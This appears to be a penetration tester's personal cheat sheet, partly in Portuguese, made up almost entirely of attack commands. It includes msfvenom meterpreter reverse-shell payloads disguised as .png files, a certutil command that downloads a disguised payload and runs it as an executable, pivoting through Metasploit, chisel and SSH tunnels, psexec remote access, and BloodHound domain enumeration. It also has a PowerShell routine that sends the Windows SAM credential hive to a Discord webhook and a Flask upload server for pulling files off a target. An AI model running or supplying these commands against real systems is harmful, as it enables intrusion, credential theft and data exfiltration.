set payload windows/meterpreter/reverse_https
set LHOST 10.100.100.10
set LPORT 4444
run
msfvenom -p windows/meterpreter/reverse_https LHOST=10.100.100.10 LPORT=4444 -f exe > agoravai.png
Github
nc -vnlp 4443
certutil.exe -urlcache -split -f "https://github.com/kalinathalie/agoravai2.png" c:\windows\temp\agoravai2.png
Rename-Item -Path "c:\windows\temp\agoravai2.png" -NewName "agoravai2.exe"
cd c:\windows\temp
.\agoravai2.exe
}
Proxying to the server via Meterpreter{
#Meterpreter
ipconfig -> get the network information
background
#msfconsole
use post/multi/manage/autoroute
set SUBNET 172.31.43.0
set session 1
exploit
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 8080
route add 172.31.43.223 255.255.240.0 1
run
#/etc/proxychains.conf [Disable 'proxy_dns']
socks4 127.0.0.1 8080
#your computer
proxychains nmap -sV -Pn -v 172.31.43.223
}
Proxying to the server via Chisel{
./chisel server -p 8081 --reverse # My machine
./chisel client -v 10.10.14.2:8081 R:1080:socks # Server
#Proxychains!
}
TailScale{
curl -fsSL https://tailscale.com/install.sh | sh
sudo systemctl enable --now tailscaled
sudo tailscale up
ssh -D 1080 user@100.101.102.103
}
Proxying to the server via SSH{
nohup ssh -R 1081 -o StrictHostKeyChecking=no tunel@10.10.14.2 2>/dev/null & # Target machine
}
Connect remotely to Windows{
MSSQL: mssqlclient.py DOMAIN/username@[Target_IP] -windows-auth
python3 psexec.py username@[Target_IP]
}
MSFVENOM{
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.100.100.10 LPORT=4444 -f msi > 100security.png
}
BloodHound{
/bin/neo4j start
bloodhound-python -u usuario -p senha -ns IP-NS -dc DOMAIN-CONTROLLER --disable-autogc -d DOMAIN
Example: bloodhound-python -u 'user' -p 'passa' -ns 10.129.251.246 --disable-autogc -d domain.local -v
Example2: bloodhound-python -d domain.yzx -u 'user'\@domain.yzx -p 'pass' --auth-method ntlm -c all,LoggedOn -ns 192.168.224.97 --dns-timeout 10 -dc DC01.secura.yzx
bloodhound
}
DnsDump{
python3 dnsdump.py -u 'user' -p 'senha' DC
}
Upload file discord{
Windows{
function Upload-Discord {[CmdletBinding()] param([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text) $Body = @{'username' = $env:username; 'content' = $text}; if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
Upload-Discord -file "C:\Windows\System32\config\SAM" -text "Key-File"
}
Linux{
git clone https://github.com/fieu/discord.sh/
discord.sh --webhook-url="$WEBHOOK" --file file.txt
}
}
Unicorn(when msfvenom doesn't work; MSF payload){
https://github.com/karemfaisal/SMUC/blob/master/MSHTA/Mshta.md
python3 unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > run -j
}
Send a file from the server to my machine{
from flask import Flask, request
from werkzeug.utils import secure_filename
app = Flask(__name__)
@app.route('/upload', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return 'No file part'
    file = request.files['file']
    if file.filename == '':
        return 'No selected file'
    # secure_filename drops path components, so a crafted filename cannot write outside the cwd
    file.save(secure_filename(file.filename))
    return 'File uploaded successfully'
if __name__ == '__main__':
    # debug=True would expose the Werkzeug debugger console on every interface
    app.run(host='0.0.0.0', debug=False)
curl.exe -X POST -F "file=@C:\Docs\arquivo.pdf" http://10.10.14.6:5000/upload
}
https://github.com/S3cur3Th1sSh1t/WinPwn
https://github.com/lefayjey/linWinPwn{
./linWinPwn.sh -t <Domain_Controller_IP> [-d <AD_domain> -u <AD_user> -p <AD_password> > -o saida.txt]
}
Port Scan hack (if the machine has nothing on it){
# curl exit 7 = connection refused, 28 = timeout; capture $? once, since the first [ ] test overwrites it
for x in {1..4096}; do curl -s -m 2 172.16.22.1:"$x" >/dev/null; rc=$?; [ "$rc" -ne 7 ] && [ "$rc" -ne 28 ] && echo "[+] Port $x open"; done
}